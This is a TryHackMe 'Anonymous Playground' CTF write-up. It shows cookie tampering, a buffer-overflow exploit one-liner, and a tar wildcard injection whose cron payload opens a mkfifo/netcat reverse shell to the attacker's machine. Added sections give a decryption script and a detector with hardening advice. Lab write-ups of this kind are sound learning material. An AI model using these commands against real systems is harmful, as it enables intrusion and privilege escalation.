Tryhackme Anonymous Playground CTF-Writeup

H3L3Kdh0riA
4 min read · May 26, 2022

Flag 1

Port enumeration

First we scan for open ports and find two of them, 22 and 80. In addition, robots.txt contains a disallowed entry for the folder /zYdHuAKjP.

The website does not contain useful information

The website itself does not contain any useful information, so we look into robots.txt.

robots.txt

The folder /zYdHuAKjP is disallowed for search engines, which looks interesting.

Access to /zYdHuAKjP is denied

We have no access to /zYdHuAKjP, so we take a look at the response headers.

Request and Response Headers

In the response headers we can see that a cookie named access is set with the value denied.

Got access!

By sending the cookie with the value changed to granted,

curl --cookie "access=granted" http://[ip-address]/zYdHuAKjP/

we gain access to the protected page. The returned HTML contains an encrypted text (maybe a username/password?).

Tryhackme shows 'zA' = 'a' as the hint for Flag 1, which leads to the decryption algorithm. Substituting every first character of a pair with an integer i and every second character with an integer y, we get the following formula for the resulting decrypted integer d:

(i + y) mod 26 = d

As an example, for nY:

(14 + 25) mod 26 = 13 => m

I created a Java tool to decrypt the username and password; of course, it is also possible to implement it in Python.

To use it, you have to clone the repository H3L3Kdh0riA/THM_Anonymous_Playground_CTF_DecryptTool (github.com) and follow the instructions in the Readme.md.
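As an added example (not the author's Java tool and not part of the original writeup), here is the same pairwise decryption in Python. It assumes the letters are numbered 1..26 (a = 1, ..., z = 26, which is what makes (14 + 25) mod 26 = 13 => m work), and that a result of 0 stands for the 26th letter z, because the formula can never yield 26 directly. The function names are my own.

```python
# Added example: Python implementation of the pair-wise decryption formula
# (i + y) mod 26 = d from the writeup. Assumptions (not stated on the page):
# letters are numbered 1..26, and a result of 0 is taken to mean z.


def letter_to_int(ch: str) -> int:
    """Map a single ASCII letter to its 1-based alphabet position, ignoring case."""
    if len(ch) != 1 or not ch.isascii() or not ch.isalpha():
        raise ValueError(f"not an ASCII letter: {ch!r}")
    return ord(ch.lower()) - ord("a") + 1


def int_to_letter(d: int) -> str:
    """Inverse of letter_to_int; (d - 1) % 26 maps 0 to z and 1..26 to a..z."""
    return chr(ord("a") + (d - 1) % 26)


def decrypt_pair(first: str, second: str) -> str:
    """Decrypt one pair: first letter -> i, second letter -> y, d = (i + y) mod 26."""
    i, y = letter_to_int(first), letter_to_int(second)
    return int_to_letter((i + y) % 26)


def decrypt(ciphertext: str) -> str:
    """Decrypt a whole string. Consecutive letters form (first, second) pairs;
    whitespace and punctuation are skipped, an odd number of letters is an error."""
    letters = [c for c in ciphertext if c.isalpha()]
    if len(letters) % 2:
        raise ValueError("ciphertext must contain an even number of letters")
    return "".join(decrypt_pair(a, b) for a, b in zip(letters[0::2], letters[1::2]))


if __name__ == "__main__":
    # Constructed sample made from the two pairs the writeup mentions: nY -> m, zA -> a.
    print(decrypt("nY zA"))  # ma
```

Feed the encrypted text from the protected page to decrypt(); the two pairs quoted in the writeup serve as a quick self-check that the 1-based numbering is right.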

Decrypting username and password

After decrypting the username and password we can try to gain access via ssh.

After a successful login we find flag.txt, open it, and hence have flag 1.

Flag 2

We take a look at the home folder of magna and find the plain-text file note_from_spooky.txt and the binary hacktheworld. The note from spooky gives us some clues, so we fetch hacktheworld and analyze it with Ghidra.

Looking at the main function and the symbol tree, we find the function call_bash.

In the function call_bash we discover that the user id 0x539 is set. This appears to be the user id of spooky. We also know the entry address of call_bash from Ghidra.

After some tries we find that we can cause a segmentation fault by piping exactly 72 characters into the binary hacktheworld.

Now we can inject the address of call_bash in the correct byte order. This escalates our privileges to spooky, so we can cd to /home/spooky and catch the second flag.

(printf -- '-%.0s' {1..72} > exploit.txt); (printf "%b" '\x58\x06\x40\x00\x00\x00\x00\x00' >> exploit.txt); ((cat exploit.txt; cat) | ./hacktheworld)

Flag 3

Now we enumerate the environment and find a tar job in the crontab that can be exploited. We prepare it with these shell commands:

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [MyVMIPAddress] 5555 >/tmp/f" > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1

Now we start a listener for the remote shell with netcat.

nc -lvnp 5555

After a few minutes the remote server connects to our machine; we have gained root access and can catch the last flag.
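The trick above works because a cron job that archives a directory with a shell glob (something like tar ... *) has the shell expand file names beginning with -- into tar options. As an added, defender-side example that is not part of the original writeup, the following Python script flags file names in a directory that a glob would hand to a command as options. The helper names and the sample directory it builds are my own constructions.

```python
# Added example (not from the writeup): detect file names that a shell glob
# would turn into command-line options, the precondition for the tar
# --checkpoint-action trick. Helper names and sample data are constructed.
import os
import tempfile
from pathlib import Path


def find_option_like_names(directory: str) -> list:
    """Return, sorted, the entries of `directory` whose names start with '-'.

    Such names are expanded by a shell wildcard into arguments that tar (or any
    other tool run over '*') parses as options rather than file operands.
    """
    return sorted(name for name in os.listdir(directory) if name.startswith("-"))


def build_sample_dir() -> str:
    """Constructed sample: a temp directory mimicking the writeup's cron target,
    with two harmless files and the two option-like names used above."""
    d = tempfile.mkdtemp(prefix="tar_glob_demo_")
    for name in ("report.txt", "shell.sh", "--checkpoint=1",
                 "--checkpoint-action=exec=sh shell.sh"):
        Path(d, name).write_text("")
    return d


if __name__ == "__main__":
    sample = build_sample_dir()
    for name in find_option_like_names(sample):
        print(f"option-like file name in {sample}: {name!r}")
```

On the hardening side, the job should pass the glob after a -- terminator (tar czf backup.tgz -- *) or read its file list from find -print0 with tar --null -T -, so that a leading-dash name can only ever be an operand; and a root cron job should not archive a directory that an unprivileged user can write to.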
